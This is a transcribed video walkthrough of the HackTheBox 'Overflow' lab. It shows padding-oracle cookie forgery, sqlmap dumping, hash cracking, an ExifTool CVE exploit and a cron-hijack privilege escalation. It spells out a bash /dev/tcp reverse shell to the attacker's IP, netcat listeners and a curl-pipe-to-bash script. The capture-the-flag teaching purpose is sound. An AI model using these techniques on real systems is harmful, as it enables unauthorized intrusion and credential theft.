What's going on YouTube? This is Ipsec. I'm going to be doing Overflow from HackTheBox, which starts off with a tough attack. It is a Oracle padding attack, so we can change the cookie from user equals your username that you registered with to user equals admin to gain administrative access to the application. It's a tough attack to actually understand and discover, but thankfully the tool padbuster makes it super easy to pull off, and you don't really need to understand how Oracle padding works. You just need to understand how to find it. And based upon the error message the application gives you, it's super easy. With that admin access, you can find a function that is SQL injectable to dump the database and another database that exists on the server to get into a different application that then gets you into a third application that has a file upload or image upload form. And it's vulnerable to an ExifTool CVE when it gets the metadata from that image, getting a shell on the server. You find a binary that's a buffer overflow / ROP challenge. So with that being said, let's jump in. As always, we start with the nmap. So -sc for default scripts, SV enumerate versions, OA output all formats, put in the nmap directory and call it overflow. And then the IP address of 10.10.11.119. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open. The first one being SSH on port 22. Its banner tells us it's an Ubuntu server, but there's not much we can do here. Then we have SMTP on port 25. Its banner says it's postfix SMTPD, but not giving us much more information, so there's not much we can do here either. Then we have HTTP on port 80. Its banner says Apache HTTPD 2429. So there's a lot we can do with HTTP, so that's where I'm going to be starting. Obviously, the interesting thing, because we don't see it much, is this SMTP, but it's kind of like a black box. There's not just a lot of enumeration we can do without knowing anything about the target. We could potentially like brute force valid usernames, but we'll need to know the domain of the box. If we get valid usernames, then we can brute force passwords. We can potentially email users. So those are things we can do, but we just need to know more information. And maybe the hostname of the box is leaking this SMTP command. We see overflow right there, but let's just go over to the web page. So 10.10.11.119. We have this welcome to overflow security. We got services, about, beginnings, and a lot of like lorem ipsum stuff here, so nothing really important. We can do a valid like contact form. So I'm just gonna test this out real quick, and I always just test with like an image source, a script source, or something like that to see if there's cross-site scripting. So 10.10.14.8, which is my IP address. And then /image, we have to close this one. And before I send this, I like doing sudo nc lvnp 80 to listen on port 80. So if someone connects to us, we can see their browser string. And then I want to send this over to Burp Suite. Make sure I'm intercepting. I am. Send the message. And that's interesting. We do have a cookie here, but this get parameter is just nothing, so we're not sending the contact form at all. And one thing interesting about this cookie is we have URL encoding. So we know right off the bat that this is something unique. It's not like just an MD5 sum or something like that. We can decode it quickly in Burp Suite. So if I just do smart decode, and then, I guess it could be base64. Yeah, that could be base64'd. Let's see, echo-n, wc-c, 32 characters. So it kind of looks like an MD5 sum, but again, it's got capital letters, symbols, things like that. So we know it's not MD5 sum. Base64-d, and just looks like a blob. The one thing I'm going to do is xxd it, because I want to know if this period is an actual period or just something my browser or command line did not want to encode. So 734A-BE. I'm going to do man ASCII real quick. Do we have BE here? Bell. I don't think that's a period. A period should be, where is it? 2E would be a period. So definitely not. Wait. 2. Is that a plus? So CO. Yeah, so it's a plus in base64, but when we decode it, it's getting to be BE, and this is not a valid ASCII thing, I think. Oh, I was looking at 2B. 2B is plus. Yeah, there is no BE, so we know right off the bat that that is something weird with the cookie. It's just random bytes. And the contact form didn't bring us anywhere, so nothing interesting there. I'm going to turn Burp Suite off while we look at the page. We can try to find if this is like HTML or PHP. Get index.html, nothing. Index.php, we get a page. So we can start running a FeroxBuster. I normally run GoBuster, but I've started using FeroxBuster more and more. The latest version on GitHub, not on my box, has this collect backups, which upon every file it finds, it will look for backups of that file. The most important one being like the vim swap file of like .file.swap, like this, I think, is the vim backup. But it's not relevant for this box. Maybe one box in the future will definitely show this tool off. But the other thing I like about it is it does recursion, so we don't have to go into each directory. We can just fire it and let it go. So I'm going to do -x PHP because we know it hosts PHP, and then HTTP 10.10.11.159. And by default, it's going to go in user share, seclist, discovery, wrapped, medium directories, and use that as the word list. So we don't have to specify the word list every time. We can just let this go, and it's going to find any file. It's probably going to take a bit longer because, again, this one does recursion, so it's going to look in all these directories, which GoBuster doesn't do, so it's a bit more like quicker. But if you just want a long-running scan, I do like FeroxBuster. So if we go to sign in, we can try like admin to log in, and we get invalid credentials. This is login.php. If we go sign up, we can try like username IP, password of password, and submit this. And it says welcome to Overflow Security. And then we have profile. I'm guessing this is nothing because like name, email, birthday, that's not like there. This looks like a dead page. These links don't work. So I'm just going to go back and ignore that. We go to blog. More lorem ipsum here. If I click read more, these links don't work. So nothing too interesting. We have SQL injection, insecure file upload, buffer overflow, and outdated software. So maybe we should try SQL injection somewhere. I just don't know where to try it because this blog looks like a static page. So let's go back out here, go to pricing, dead link, and then we could log out. The other thing I want to do is look at the cookie again because now I'm logged in. If I go to a new pane, echo-n, that's not what I wanted to paste, wc-c, we have 34 characters. Oh, because we have this URL encode, 2b. And 2b, I want to say, is a slash. Let's go back to Burp Suite and do this, smart decode. It is a plus. And if I remember at the beginning of the video, I had said that was a plus, but so it's 32 characters. The next thing we can do is probably try like a longer username. I'm thinking because this is random bytes, this is some type of encryption, not hashing. Even though we're getting 32 characters, we are, what should I say? Like getting random bytes. It's not a valid hash. So I'm thinking it may be to do with encryption, and also like that like slash and plus that we saw in the previous cookie wouldn't be good for a file system, so we know it's not storing it there. So I'm just going to do ipsec. I'm going to see if the cookie length changes. We will have to remember to decode it. And let's do echo-n, do this, wc-c, and it's 44. So this is definitely base 64. Let's go to our old cookie, base64-d, and then we can pipe it to wc-c, and that is 24. Go to a new cookie, the super long one, base64-d, wc-c, And this is 32. So I bet if we did an even longer cookie, it will go up again. So this is going in increments, or not increments, maybe it's increments, but it's always going to go by 8. So we know this is probably going to be encryption and a block size of 8 because IPsec was, or just IP was 24 and IPsec was 32. I'm going to add another IPsec in there and see if we go to 40. If we do, we know it's definitely going to be crypto related. So let's log out, sign up. Let's do IPsec 3 times. Log in with a password. And that's looking to be the same length off of eyeballing it. Maybe not. Let's do smart decode. Echo-n, base64-d, wc-c, still 32 characters. So let's sign in, or sign up. I'm going to try one more IPsec. Password of password. Submit. And then let's go paste this cookie, smart decode, echo-n, base64-d, wc-c. So now we hit 40. So this is definitely a block size of 8. Seems like every 8 characters we put here, we go up by 8. So 24, 32, and 40. Now, the issue is, like, what happens if we change a byte? So let's just modify a random byte in our cookie to see what happens. Instead of this LP, I'm going to put IP, I guess. And then we refresh the page. It goes to login.php. So let's try logging in, IPsec of password, IP password. We log in. If I just delete a character, so get rid of that B, refresh, and we have it telling us there is invalid padding. So if we did a lot of Googling on crypto and invalid padding, padding Oracle would come up. And whenever you get a specific error message about padding, you can brute force the, well, you may be able to use Oracle padding to brute force it 1 byte at a time. And I probably do a better explanation before. Let's see, Oracle padding. So probably the lazy video, if you go there or go to OXDF's write-up, padding Oracle is probably going to be explained a bit better. But for this sake, just know that when you get error messages specifically to padding, you can probably try a padding Oracle attack. So I'm going to check out other error messages. So we had error is equal to 1. Error equals 2, 3, nothing there. I'm going to try a comment after 1. That looks promising. Single quote, double quote. So it doesn't look like anything is happening here. 0 equals 1. That, yeah. So I was just testing for basic SQL injection, and I didn't really get any different results. So I'm going to assume this is Oracle padding. If we go back to FeroxBuster, we see it is still running and doesn't really have that much. One error message, but still just hunting. We have index.php. Let's go back over here and let's see. We want to run padbuster. And then the URL, so http 10.10.11.119. And then we want to get the cookie. So I'm just going to do IP password. And let's see, we can just paste this in. And then the block size is going to be 8. It's normally 8 or 16, but we confirmed it was 8 by looking at the length of the crypto. So we know the block size is going to be 8. And we also need to specify the header. So it's going to be cookie auth is equal to the same exact thing. And I want to say that is all we need for padbuster. I'm going to put a time command here. So again, padbuster, URL, the secret, and then how the secret interacts, which is the cookie. And this takes a while to do. No error string was provided. So we just have to wait for this message to come back because it's doing some type of analysis. And then we're going to tell it where the error message is. So once we have that, this will probably take 5 to 10 minutes to run, I think. But we do have the time command to tell us. So I'm just hoping this the response analysis runs quickly, so it's easier for me to edit the video, but I'm going to pause it and then we'll come back. And shortly after I was done talking, it did pop up with the following response signatures. I'm going to do the one it recommends, which is 2, and it's just going to continue. And we know this one is correct because when we were looking at it before, we were looking at the actual error. This is what actually tells us the padding is wrong message. And we can see the very first byte has been brute forced. It's probably going to go 8 times, I want to say, but yeah. And this may be block. I don't know exactly what this one was. Once it gets into crypto, my knowledge is not great. So going to let this run. We'll see how long it takes. Okay, it's now been 8 minutes and padbuster has completed running. We do see it decrypted the value as user is equal to IP, and we can see that in hex, and then after all this, we just have blank characters. The 00 is terminating the string. But one thing padbuster also allows us to do is replace the cookie. So I'm going to do -plain. I'm going to say user is equal to admin, and just let this run. It'll probably take about 8 minutes again to run, maybe a bit longer. There is something I do want to talk about because there's only 2 blocks in this. I know just a few minutes ago I stumbled across like cracking each byte of block. So it takes each block and cracks each byte through the padding oracle. Because the padding oracle error message exists when it's invalid padding, you can brute force this 1 byte at a time. Now, the weird thing is the length is 24 of this, and we only have 2 blocks and each block is 8, so that's 16. I would guess the extra length comes from other things like the metadata around the encryption, talking about the algorithm, the initialization vector, and we can kind of prove the initialization vector by just logging in multiple times and seeing if we get different cookies. So I'm going to log out. Let's go to sign in. We can do IP and then a password of password. We set it. Set this to 2 so padbuster keeps running. And let's intercept this request. Go to here, turn burp suite on. Send this over to repeater. And invalid credentials. Maybe we have to sign up again. Maybe it just erased our username. So let's turn burp suite off real quick. Sign in. IP, password, submit. Okay, so now if I send this, we get a cookie. And I send it again, we get a different cookie. So every time we do this, we're getting something different, which is probably just the initialization vector of the crypto. But if we looked at the length every time, so if I echo -n, base64-d, wc-c, we'll always get 24 as the length because that's just 2 blocks. So the very first set of 8 characters, I would guess, is just metadata around the crypto. And I don't know how to show you that just like this. So I'm not even going to try to BS my way around it. It's just my guess at exactly what is happening here. But I'm going to wait for this whole padding oracle attack to finish, and we get a cookie that gives us user is equal to admin. And again, it's going to take over 8 minutes, so with some editing magic, we'll just jump ahead. And 7 minutes later, we have a new thing. It says the encrypted value is this. Let's go and try this out. So I'm going to go to auth, paste in this new value, go to home index, and we have a new thing called admin panel. So we have successfully logged in as the administrative user by just doing an oracle padding attack. If we go here, we have this CMS Made Simple. I try logging in with admin. I don't have it, and I don't know the admin's password because we just forged a cookie through the Oracle padding attack, so there's not much we can really do on this page without like an actual exploit. We could look at searchploit and see if there is one for CMS Made Simple, but there was also a logs endpoint. So if I go here, we just get undefined. I'm going to look at exactly what that request did. So I'm going to go to Burp Suite. Let's turn intercept on and then click logs again. That was weird. Nothing happened. Let's forward this. And it's getting home logs.php, and we have a host of overflow.htb. So that's probably why this is erroring, because it's trying to put information on the page somewhere. And we can probably better show this if we just look at the network tab, reload the page, and we see, let's see, is there any error messages? What happens if I click logs? I was expecting to see something to overflow.htb, but I don't. Let's see, refresh again. There we go. So we have this one. It's not even a 404 error message. It's just blocked because we don't have DNS here. So what I had done here is I did Control-Shift-R to like refresh without cache. If I just do Control-R, looks like it still does the same thing. But this is me hitting Control-R. You can see all these pages. If I hold Shift when I press R, it gets more because it's wiping the cache. That time we didn't get that thing. So oddly enough, I don't see it every time. But I just want to get overflow.htb in my host file, so sudo vi etc host, and we can do 10.10.11.119 overflow.htb. Save this. Now when we refresh this page, we should now get overflow.htb. Maybe it's cached. Or looks like it may be a CORS header as well. So I'm just going to go and navigate to it. So if we do overflow.htb, if we go here, unknown host. Did I type of this? I'm just doing it twice to make sure I didn't typo, but this could be a caching issue that just takes time to fix. There we go. Did I... overflow. I don't think I typoed that. I don't think I need it twice. I'm just going for good measure. Delete this entry. Refresh. Yeah, it was a DNS caching thing. That's such an annoying issue to work with. But if we do this, we get unauthorized. So we probably want to add a cookie, because for some reason a cookie's not here. So auth is equal to... Oh, the cookie's not here because we changed domains. So let's see. If I go back to my storage, we grab this, and I go to overflow.htb. I won't be logged in anymore because, again, we changed domains. I'm just going to log in with IP, password. It's probably deleted my account by now. Do we have a cookie here, though? We don't. Sign in, IP, password, submit. What? IPsec, password, submit. There we go. So now I have the cookie generated. I could have made it myself, but I'm always lazy like the site to do it for me. So now if I go click on logs, we get login timestamps. So what was happening before, again, I just did not have the cookie set. So let's copy this, go here. It was what? Cookies, auth is equal to this. Is it cookie? Yeah, I always get that mixed up as well if it's cookies or cookie. But here we go, we have a login thing. And if we change the name to IPsec, we get nothing. IP, So it looks like it only works with admin. If I do a single quote, we get internal server error. If I do a double quote, it does an OK. So right now I'm thinking I created an SQL error, because if I just did IP as well, it just says 200 OK. So if I do a single quote and then a comment, we get internal server error, and sometimes SQL statements use parentheses, so we can add that there, and now it's 200 OK. So we know we have SQL injection here. We can do like union select 1, 2, 3. And we see last login down here. We can go through the whole manual way of exploiting this, but I'd rather just go into SQLMap. So let's just save this request to a file. So copy request to file. What is that? Save entire history. There we go. Copy to file. HTB. And the box name is overflow. And I'm just going to do logs.request. Save it. And then we can just do the time command again, SQLMap. And the only reason I'm adding time so you can see how long these things take. --dump -r is going to be logs.request. We can actually just do, we can do dump first. And just see how long it takes to dump everything. And then add --batch so it doesn't ask us any questions. And this is probably going to take a while to run. So I'm just going to let this run. Grab a drink, and we'll come back when SQLMap dumps everything. So that really took no time at all. And the reason why is it only dumped the current database. I wanted to add like the -dump-all flag to dump everything, but this can take a while to run because of the information schema. So I'm just going to look at what databases are available, because if you remember, there was a second thing, the admin panel pointed to the CMS panel, and we have it here. There's also a overflow database. We only dumped logs, so we can dump everything. So let's do --dump. We can do -d. I'm going to look at overflow first, and it's automatically trying to crack some things. We probably shouldn't have done something. I meant like the --batch, because it automatically attempts to crack all things. But we do have a password here. If I do echo-n wc-c, that is 32 characters, so probably going to be an MD5 sum. We can log out and try logging in with that password to see if we have that. Admin, this hash, and we get invalid credentials. There is also that other database. If we look back at the DBs, we have CMS MSDB. So I'm going to dump that one as well, CMS MSDB. And it's going to start dumping a lot of tables. So I'm guessing it just got to a username list because it's attempting to crack already. This one may be users. I'm not sure. Let's just let SQLMap finish. So a minute later, we have it done. We didn't have to do the dump. We could have done like --tables and like dumped each table this way. Like we could do this and then specify -t CMS users, I believe, would also work. I forget exactly how to specify an exact table in SQLMap. But the way I generally go about it is I just dump everything because I want the whole database. And then I go into .local, what is it? Share, I believe. And there's a SQLMap directory here. This is where it stores all the history of your commands. And then I go into output, and then I go overflow.htb, and we can go into dump, and it dumps everything into CSV files. So here we can just look at CMS users.csv and look at that table. So this is generally how I do it. We have user ID, email, active, password, so admin, and we have this MD5 sum it looks like, that looks like 32 characters, echo-n, wc-c, 32. So I'm going to go over into the Kraken, and we can go into hashcat, v, hashes, overflow. I'm going to put this MD5 sum, and then we can go into the overflow table and put the next MD5 sum as well, and try cracking both of these. So /hashcat. I think mode 0 is actually MD5 sum, but I'm just going to see what happens if I just give it 32 characters. Actually, that's going to be the same for NTLM. Example hashes less MD5 is hash mode 0. So let's do -m0 hashes overflow opt word list rock-you to see if we can get any quick wins here. I'm not sure exactly what dictionary file SQLMap uses, but I don't think it's rock-you. And it looks like it is just about done, and we don't have any cracks, which is a bit odd. So I'm going to go look at the actual software. If we go into, let's see, the admin panel, this CMS Made Simple. So if I Google CMS Made Simple, let's see what we have. If I just download it, let's see, wants to download a zip. Not sure. Save file. Let's move this here. So I'm going to make dir CMS, and then we can move downloads CMS Made Simple into this directory, and then unzip it. And wait, what? It's just a single PHP file? I don't like this. And then it is compressed here? I don't know exactly what's going on there for that installer. I just want the source code. That is a weird way to do it. I'm guessing the application, like, if I do a du-hs on this. Yeah, it's a 6.8 meg PHP file, so it's got a bunch of things packaged in here. So I'm going to try to download it from Subversion, which is just like Git. And I copy their svn command to download it, and it looks like this may be doing a better job. I'm kind of like nervous because of like all these file names, like this nl.php. But I'm guessing that's just languages, and we have a normal thing. So this looks better. grep capital RI MD5. And let's see. Micro-tiny utils, hash salt. We have to figure out how the login works. So let's see. Is it like a login.php? Find.grep login. If I do admin, v login.php. And it's been a long time since I looked at this. Let's see, how do we do the hash? Code MD5 user password time. Let's see. If I go to this include, maybe that's in there. Where was that include? Lib. V lib include. Is there something here? let's grep this whole file for password. grep-i, password, don't have anything, and hashcat did not crack anything. So let's just trace the login request. So if I go back to this CMS Made Simple, I'm just going to open up the network tab. We can do admin admin, try to log in. Then I can look at this request. Whoops, did not mean to double click. Go here, look at the request. We're sending the password in a variable called password in a post. So what I'm going to do is grep-R, and then we can do post. Probably should do RI. And then password like this. Unmatch that. Let's escape this. Okay, so we probably want to get rid of all the languages. So I'm just going to grep-v language. And we only have this appearing in login.php. And I can see user to set password. I'm guessing that's going to be the function. But we can just look at this. Login.php. Set password. So see if I do set password elsewhere, it's only here. So this is the forgot password change form, but there is a function called set password, and that's going to tell us how this is MD5'd. So grep-r, set password, like set password. Oh, let's see, grep-v. I wonder if I can get rid of CMS mailer. What is this? Right here. We have function set password right here in this lib. So let's look at this class user include.php. Get rid of the starting with the slash. Set password. And it is an MD5, but it's doing a salt. So it puts the site mask next to password. And I'm guessing this get site preference is going to be site mask, and if site mask doesn't exist, it does nothing. So we just need to figure out what site mask is and then put that before the password. And this is a way that a lot of old like web forms used to do salting. If we look at the shadow file of our box, we'll notice that the salt is unique per user, which is the correct way to do it. A lot of web forms initially just had one static salt for every user. So once you figure out the salt, you can brute force all the passwords. The whole idea was if your user table got leaked, then they can't really crack the password because they don't know the salt for that MD5. However, if your user table gets leaked, chances are the attacker is also going to leak the salt if you have a universal salt. So let's look at the site mask variable. And we can easily just go, what is it? Local share SQLMap, then output, overflow.htb, dump, CMSDB, and I'm going to grep, what was that? It was pref or something? Probably site pref. It's just cat or shoot. I guess I can go back in the source and pull it. This is why it helps to take notes. Can't do everything off memory, even if it was just like a second ago. Let's see. Find.grep user cd classes v class.user.include.php set password. So site mask is what I want. grep-r site mask. And we can see the site mask value is this. If I view the CMS site preference file, we can see it's weird. I was expecting it to have the titles, like this will be the preference, then comma, the value or something. Because we don't have create date, modify date. We have the site preference name and site preference value. I think this... I guess if it's blank, it's putting it here at the end. It's a weird way for SQLMap to do it, but we do have the site preference value. I was expecting it to do blank, blank. Like this would make more sense to me because this is the header for your CSV file. So seeing create date, modify date, and then seeing the very first value be site mask, I'm like, that's not a date, but I guess the blanks just go to the beginning. That's weird. Site pref name, site mask, site pref value, this. So we have the site pref value now. So let's copy this, go over to the cracker. Let's see, v hashes, and then overflow. And I think the format is salt, password, then salt. And this is the one for CMS DB. This is the one for overflow. I'm just going to delete that one. I really hope I got that right. Let's see, ls grep user. Let's just cat this. Starts with C6. Starts with C6. Okay. So now we can do the example hashes again. And we have, let's see. This is MD5 sum password then salt. We don't want that. We want salt then password. And that is hash mode 20, salt.pass. So if I rerun this and now change it to 20, because the hashes overflow is the MD5 : salt, which is the format it wants, we can try cracking this. And if it doesn't work, then I'll probably put the salt before the password hash, because I may be doing that wrong, but I'm pretty sure salt comes after. So now it's running with rocku. And let's see, 68%. And it did not crack. However, as it was working, I just thought of something. I ignored this second entry because we had the blank thing. But we do have a username as editor and another MD5 hash. So I'm going to try grabbing this one as well. And let's just try cracking this before we change anything. Go back to hashcat, v hashes overflow, and then let's put this in and attempt to crack this and see if this one returns anything. And almost immediately, we do get a response back, alpha bravo thing here. And that was the editor username. So we can probably log into this now. So if I do editor, put in this password, we get access to this CMS. Now that we have access, it's probably time to look at exploit DB, because normally when you have a content management system, there's not unauthenticated RCEs that are common, but authenticated ones are extremely common because oftentimes you can just edit a file somehow in the CMS and then get code execution that way. So I'm just going to search exploit DB for CMS Made Simple. And here we go. We have a RCE on 2215, and it's present in edit user tag. So login as administrator, extensions, user defined tags. We're an editor. We don't know if we're administrator, but we're in the admin console, so maybe we are. So let's go to user defined tags. And one thing I do note is make sure you check dev-job.overflow.htb, but let's try to add the tag real quick. So I'm going to do what it says. Is it in the name or not? It just says exec. So I wonder if we just do exec. We'll try, actually instead of exec, I'm just going to do php info. I'm going to do that in both places. UDT name starts with what? Let's do test. There we go. And we don't have PHP info here. So I don't think it's executing. We can go ahead and do what it says and just put a reverse shell. Maybe we don't get output from this command. So I'm going to try putting the reverse shell here and seeing if we get anything. So we want 10.10.14.8, then 9001. That looks good. Let's just do nclvmp 9001, submit, and nothing is happening. So we don't have anything. Let's check out this dev job workflow thing. So I'm going to add this into my host file. So sudo v etc host, and we can add this host name here, navigate to the site, and we have a login. I'm going to try editor and then that password again. The password is like Alpha Bravo, right? Right here. Let's grab it. Paste. Login. And we have something. We can navigate around to see exactly what this is. We got an account here. If I click on account, we can upload a resume. These buttons don't do anything. If I click this, just try to upload something. I'm going to put this in Burp Suite to see what it says. We need to turn it on. Do this. We get a move temporarily, and it goes upload to, and nothing. We have a log out. Let's turn Burp Suite off. Oh, file type not supported. Did it say that here? Right here. File type not supported. I wonder if we did a PDF or something. So let's do find grep PDF. And I'm just going to copy a random PDF that I have on my box. If I file it, we do have a PDF document. Let's try uploading this. So HTB overflow decrypt.pdf. File type not supported. So we want to try to figure out exactly what file types are supported here. Let's see. Do we have something here? Post, file upload, upload file. I'm guessing it's something I'm just not reading. Okay, upload your resume in TIFF, JPEG, or JPG. Right here, I think. If I just read this text, the light gray on white background is not super easy to see, but we want a resume in JPEG format. So I'm just going to find a random JPEG. See if we have something. Let's see. We can use this sliver one. So CP, upload resume, video 1. Sure. File uploaded successfully. So if we look through exactly what happened here, let's see. Is this us? File name, that's the PDF. So right here, we uploaded the file, this JPEG, and it gives us ExifTool output, specifically the version. So I'm going to Google ExifTool 11.92. So ExifTool 11.92. Let's turn Burp Suite off. I always just hate intercepting my regular internet traffic. So that's why you see me turning it off and on so much. We have this CVE 11.c version, audio version of it, ExifTool. So 12.23, what version is this? It was 11 dot something, so I'm guessing this is going to be vulnerable. So this, I wonder how we get the payload.bin. I'm going to just Google the CVE in GitHub and see if we have something. So let's clone this and see how this works. So git clone, cd CVE, and we have a config file, which is just ExifTool stuff. Then we have exploit.py, and this is going to look like it creates a Perl reverse shell here. So we should put our IP address. So 10.10.14.8, 9001. And if we read, let's see, this entire post, we'd understand exactly how the exploit worked. It tries to parse something in the, I guess, deja vu file format that leads to code execution. So let's just try this out to see if it works. It looks like we have edited all we need. We just need to put the IP address. So Python 3, exploit.py, no such file or directory name, bzz. So we probably need to install bzz because it's doing the subprocess run on bzz, deja vu, make, and ExifTool. So apt search bzz. Does this exist? Let's see. Install bzz apt. Or install djvu. See, apt search djvu. That is a lot of things. Viewer for the format. Simple creation of deja vu files. I'm going to try installing this real quick. Sudo apt install deja vu bind. We can go to the GitHub repo to see if they said anything. They do. We need to install deja vu libre bin. So I'm going to just leave this bind to see if it actually works after this. And if it doesn't, then I will follow their guide. So it looks like when I installed was probably just more things than I needed. I'm guessing this is a specific package, but the deja vu bind package probably included this. Vu libre bin. Yeah. So I installed a lot more packages. I should have read the README first. So if I do strings on image.jpg grep 1010, is that what it created? One file image updated. Let's see, I'm guessing it's this image.jpg. Let's try uploading it. And we have our reverse shell listening. So if we go, let's see, where's the CMS made? It was the dev build, right? This. And then go to my account, upload resume, and let's try image.jpg. We see it's hanging, which is a good sign, because we got a shell. So Python 3-c, import pty.spawn, bin bash, stty raw minus echo, fg, enter, enter. And then export term is equal to xterm, so I can clear the screen. And now we have access to the server. The very first thing I always like doing is extracting the SQL passwords, or SQL passwords. So I'm going to go in the config directory, cat db.php, and we have dev manager and this password. So let's see. Let's go up one, v creds, dev manager. Let's copy this password. And that's also the develop table. Okay. And then we can go into HTML, see if it's using the same creds. Cat db.php. And we have another MySQL. This is developer. And then sh@tim@n. And this is the overflow table. Okay. So let's cat etc passwd. And we do have a user called developer. And we had a password for developer, so let's just try a su. So su-developer, sh@tim@n, and it looks like we log in as developer. So I'm going to try SSHing real quick, so we get a better shell, 10.10.11.119, and then sh@tim@n. I may have typoed that. Let's cat creds. I'm just going to copy and paste because that will make sure I don't typo. Paste. And there we go. So now we have a shell as developer. Something weird is happening. We have illegal option -o history. If I just type bash, I get the normal prompt that I want. I'm guessing I was in like a shell prompt. Do we have tab autocomplete? No, we don't here. If I type bash, now I have tab autocomplete. So now we're part of developer. If I do cd home, we still don't have a user.txt flag. So I always like finding what files I can edit. So I'm going to do a find-user developer. I think I do slash like that or a slash at the end. Let's see. I think it's like this. And then to dev null. And I can also specify -ls. So this is going to show me all the files I own. And I'm going to grep-v for /run and /proc, because we don't care about those directories. And I'm going to get rid of this ls because it's making my things go off the line. Like, there's too much data here. The main thing I did -ls because I wanted to make sure I was only saying files owned by developer, and that looks like it's the case. So we have LXC. Am I part of that group? No, I am not. I am a part of the network group. That is interesting. That's my home directory. That's sys. So we can add sys to the exclusions because that directory is not interesting to us. Dev PTS. So we don't really have anything interesting. We can do the groups. If I do -group network, because it's really interesting that I'm part of that group. And there's only one file, etc host. If I look at this file, lsla etc host, it looks like, let's see, we can write to this file because we're part of the network group, and these are the group permissions. We have write access to etc host, and I was about to say, that looks like my etc host. I'm just going to put 127.0.22 test. I just want to make sure I can write to it. Cat etc host, and I can write to this file. So that's unique. Looking in developer, not exactly sure what I can do. I'm going to go back to the group. Let's look at group developer to see if there's anything here. We have LXC stuff. We have a Vim info file, SSH, and nothing else. So I'm going to look at the Vim info, see if we have anything. This is probably us, right? That's WQ, I think, on the history file, or the etc host. So yeah, we're only editing etc host in this Vim info file, so nothing interesting there. So let's look at all the users on this box. I'm going to cat etc passwd, grep for everything that ends in sh, and we can see there's root, tester, and developer. There's also www data that we were, but that is a no login thing. So if I grep this for www, we can see it's no login here. But there is this tester user that I'm curious about. So I'm going to go back to my find command, And we're going to specify the -user option. I'm going to look for files owned by tester to see if there's anything here. And the reason why I'm doing this is mainly because I don't have the user flag yet. So I'm just seeing if there's anything else interesting. There is this home tester directory. And we can't read user.txt because we're not a part of the tester group. There is mail. Can I read his mail? If I do var mail tester, permission denied. We also have commontask.sh. So if I look at this, I'm guessing there's some type of cron running. It says make sure it's running every minute and then doing bash and this process substitution thing here. If you want to know more about process substitution, we just covered it on my channel. So if I do youtube.com/c-ipsec, I would recommend watching executing Linux binaries without touching disk, because we go into exactly what process substitution is in depth. But for this, it's making a curl request to task.overflow.htb, task.sh, and piping it to bash. So essentially, this is doing the same exact thing as this, right? These commands are pretty much identical. So we have the ability to edit the etc host file. So I'm going to point taskmanager.overflow.htb to my box and put a reverse shell there. And we should be able to escalate to the test user. So let's delete this, 10.10.14.8. Point that, and then I'm going to kill that pane, make dir dub v test.sh, and we're just going to do a bash reverse shell, so bash-i dev tcp 10.10.14.8 9001 like that. Then python 3-m http server listen on port 80. And start up another netcat shell. So save this, and then we probably have to wait for the next minute, which we literally just missed. Or wait, maybe not. It did a get on it, and I have the wrong file name. Shoot. Let's see, move .. what do I call it? Test.sh. Did I really call it that? I did. Move test.sh to task.sh. And now, this should work. So if I do date, we have it in 30 seconds. So probably in another half a minute, we'll get a hit. So I'm going to pause the video and we'll just wait. And here we go. We see it hit and we got a shell as the tester user. So I'm going to do python 3-c import pty.spawn. Actually, let's do a SSH. We always do reverse shells and import pty, but we can just SSH as the user if we create a new key. So ssh-keygen, we'll call the file name tester, cat tester.pub, and let's just copy this, and then echo it into authorized keys, like that. And then we can just sh-i tester at 10.10.11.119. Cat tester. Okay. I don't know why that did not work. chmod 600, authorized keys. There we go. Just a permission issue. So now we can close that pane and we have a better SSH prompt. So let's see. We can get user.txt. If I look at all the files here, there's nothing really interesting. If I go back to this opt directory, there is a file encrypt. And we can also see there is a plus here. So that plus is an extended attribute. If I do a getfacl command on commontask.sh, we can see developer has read-write over that. So when we read this before, as the developer user, I think I sent it to this pane. If we went into /opt, Common task, like you may be questioning, why can we read that? Because everyone doesn't have read execute or read write or anything. And we're not a member of tester. But if we do getfacl on this file, again, getfacl on common task, we can see the extended attribute does allow us to read to it. So that's why we can read this file. If we go into this file Encrypt, there is a README here. And a couple of reports have been leaked to avoid this. Created a tool to encrypt reports. Please use the pin feature and report any issues. The pin should be in your inbox. So if I look at my inbox, let's do a mail command. Var spool mail cat tester. Let's see. From tester at overflow. Received root. So this is a cron. And we just have junk here. So there's nothing in the mail. So awesome. Let's go back to file encrypt. If we execute this file, we have the pin. Let's do 1, 2, 3, 4, wrong pin. Let's try it again. And what I'm noticing is we have the same code every single time. So the 3 times I ran this file, we have the same code. So I'm going to copy it to my computer, and we can test this out to see exactly what is going on. So I'm just going to SCP it. That would be the easiest. So scp-i tester at 10.10.11.119 opt file underscore encrypt here, and I'll specify -r so we copy a folder. I put the private key in my www directory. Probably should move that out of there. Because if this was an actual engagement, I'd be potentially leaking a private key to a box, which definitely is not good. So move file encrypt also out of the www. And if I execute this, we get the same exact pin. So something obviously is like wrong here. I would expect this pin to be different each time. So let's open up in Ghidra and see what Ghidra says about this binary. May take a second to open it, but once we do it, we can do file new project, and we'll just call this overflow, and then click the little dragon icon to open the disassembler or decompiler, whatever you want to call this. Then I hit I, and I just open up the file, and we'll do all the default options for analyzing this. Analyze, okay. If I go over to the functions, we can see there is a check pin function, an encrypt function, and main. Let's start with main. And all main is doing is running this check pin and then returning 0. So let's go into check pin, and we can see it starts off by just doing rand and then enters code for pin. So this is just an insecure way to do rand. You should call srand before random to initialize a random seed. And I think srand by default uses the time, so that's not a great option, but it's better than what we see here. So if I just man, I think srand it tells us. So if no seed is provided, the rand function is automatically seeded with a value of 1. And the seed, think of it as just a database on all random numbers. So this is where it's starting. It's the initial calculation of random, which sounds weird because you can never calculate random, because when you can calculate random, it's no longer random. So every time it's doing this, it's just initializing with 1. So every time we run the application, it's going to be the same. So we know this is not random, even though the function's called random. And then it says this is the code, enter the pin. And let's see, we could probably figure out how to calculate this pin. Let's see, where is it doing here? So enter pin. If local 14 is equal to local 18, print name. Where are we calculating pin? If I look at check pin, that's where I'm at. I bet it's this random function. Yep, this. This is not actual a specific like C thing. They actually created a function called random, and we can see what it's doing here. We could like do this in Python or something so we can build a pincode brute forcer, but I think OXDF does that. I'm going to do it slightly differently because it's the same thing every time as we execute this program. It's going to be the same pin whether we're on this box or this one. So I'm just going to do the cheating way and GDB this. So we'll reverse it. If you want to look at the code, I'd highly recommend his blog because I don't think he's going to do it this way. I think he's doing it through the Python program. So I'm just going to break on main. We can run this. And then I'm also going to break on check pin. Continue. And now we're here. We want to get to this check pin. If we go, where is it? There's a back here. If I click this, there we go. We want to break on this line. So I want to 